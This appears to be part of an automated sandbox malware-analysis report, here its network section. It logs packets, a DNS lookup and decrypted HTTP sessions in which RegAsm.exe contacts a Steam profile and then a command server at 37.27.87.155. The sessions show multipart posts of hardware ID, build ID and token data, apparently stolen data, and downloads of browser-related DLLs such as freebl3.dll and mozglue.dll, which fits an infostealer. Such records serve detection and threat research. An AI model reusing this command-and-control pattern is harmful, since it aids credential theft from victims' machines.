                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.360933065 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.800988913 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801259041 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801569939 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801579952 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801788092 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801788092 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801795959 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801805973 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.633713007 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.633758068 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.633820057 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.634057999 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.634073019 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721510887 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721586943 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721606016 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721653938 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721693993 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721740961 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.722562075 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.722573042 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.104967117 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.105035067 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.351993084 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.352312088 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.352348089 CEST4434975737.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.354499102 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.354559898 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.354754925 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.355057001 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.355068922 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.795419931 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.795737982 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.796222925 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.796252966 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.796397924 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.796412945 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643594027 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643701077 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643762112 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643795013 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643826962 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643856049 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643919945 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643949986 CEST4434975837.27.87.155192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2024 17:07:57.809856892 CEST | 50566 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2024 17:07:57.915806055 CEST | 53 | 50566 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 19, 2024 17:07:57.809856892 CEST | 192.168.2.4 | 1.1.1.1 | 0x814c | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 19, 2024 17:07:57.915806055 CEST | 1.1.1.1 | 192.168.2.4 | 0x814c | No error (0) | steamcommunity.com |  | 184.30.122.179 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                                                                                                                                                • 37.27.87.155
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 184.30.122.179 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:07:58 UTC | 119 | OUT | GET /profiles/76561199673019888 HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-04-19 15:07:58 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                                                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:07:58 GMT
                                                                                                                                                                                                                                                                                                Content-Length: 33790
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Set-Cookie: sessionid=33457ce14201bbf752e065d7; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C0260b8e04ad19c244dfaa60e7b0ec044; Path=/; Secure; HttpOnly; SameSite=None
2024-04-19 15:07:58 UTC | 14514 | IN
                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-04-19 15:07:58 UTC | 10062 | IN
                                                                                                                                                                                                                                                                                                Data Ascii: obal_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
2024-04-19 15:07:58 UTC | 9214 | IN
                                                                                                                                                                                                                                                                                                Data Ascii: teamgames.com\/&quot;,&quot;STATS_BASE_URL&quot;:&quot;https:\/\/partner.steampowered.com\/&quot;,&quot;INTERNAL_STATS_BASE_URL&quot;:&quot;https:\/\/steamstats.valve.org\/&quot;,&quot;IN_CLIENT&quot;:false,&quot;USE_POPUPS&quot;:false,&quot;STORE_ICON_BA


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:07:59 UTC | 169 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-04-19 15:08:00 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:07:59 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
2024-04-19 15:08:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:00 UTC | 261 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHII
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 279
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-04-19 15:08:00 UTC | 279 | OUT | Data Ascii: ------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="hwid"B661D90C82332632427659-a33c7340-61ca-11ee-8c18-806e6f6e6963------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------
2024-04-19 15:08:01 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:01 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3a1|1|1|0|c9610058ffb34689dc5e00e3a617e50b|1|1|1|0|0|50000|00

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:01 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:01 UTC | 331 | OUT | Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------BAKFCBFHJDHJKECAKEHICont
2024-04-19 15:08:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:02 UTC | 1564 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49734 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:03 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:03 UTC | 331 | OUT | Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------KFCBAEHCAEGDHJKFHJKFCont
2024-04-19 15:08:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:03 UTC | 5165 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49735 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:04 UTC | 262 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKK
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 8381
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:04 UTC | 8381 | OUT | Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------AKJDGIEHCAEHIEBFBKKKCont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:05 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49736 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:05 UTC | 177 | OUT | GET /sqln.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:06 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:05 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Thu, 18 Apr 2024 12:03:08 GMT
Connection: close
ETag: "66210bfc-258600"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49737 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:08 UTC | 262 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEH
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 4677
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:08 UTC | 4677 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74
Data Ascii: ------BFBFBFIIJDAKECAKKJEHContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------BFBFBFIIJDAKECAKKJEHContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------BFBFBFIIJDAKECAKKJEHCont
2024-04-19 15:08:09 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:09 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49738 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:09 UTC | 262 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBF
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 1529
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:09 UTC | 1529 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74
Data Ascii: ------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------JJECGHJDBFIJJJKEHCBFCont
2024-04-19 15:08:10 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:10 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49739 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:10 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:10 UTC | 437 | OUT | Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------GDAAKFIDGIEGDGDHIDAKCont
2024-04-19 15:08:11 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:11 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49740 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:11 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGC
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:11 UTC | 437 | OUT | Data Ascii: ------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------DBFCBGCGIJKJKECAKEGCCont
2024-04-19 15:08:12 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:12 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49741 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:13 UTC | 156 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache
2024-04-19 15:08:14 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:14 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-a7550"
Accept-Ranges: bytes
2024-04-19 15:08:14 UTC | 16138 | IN | Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                                                                                Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:15 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                                                                                                                Data Ascii: 0<48%8A)$(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49745 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:16 UTC | 156 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache
2024-04-19 15:08:16 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:16 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-94750"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49748 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:18 UTC | 157 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache
2024-04-19 15:08:19 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:18 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
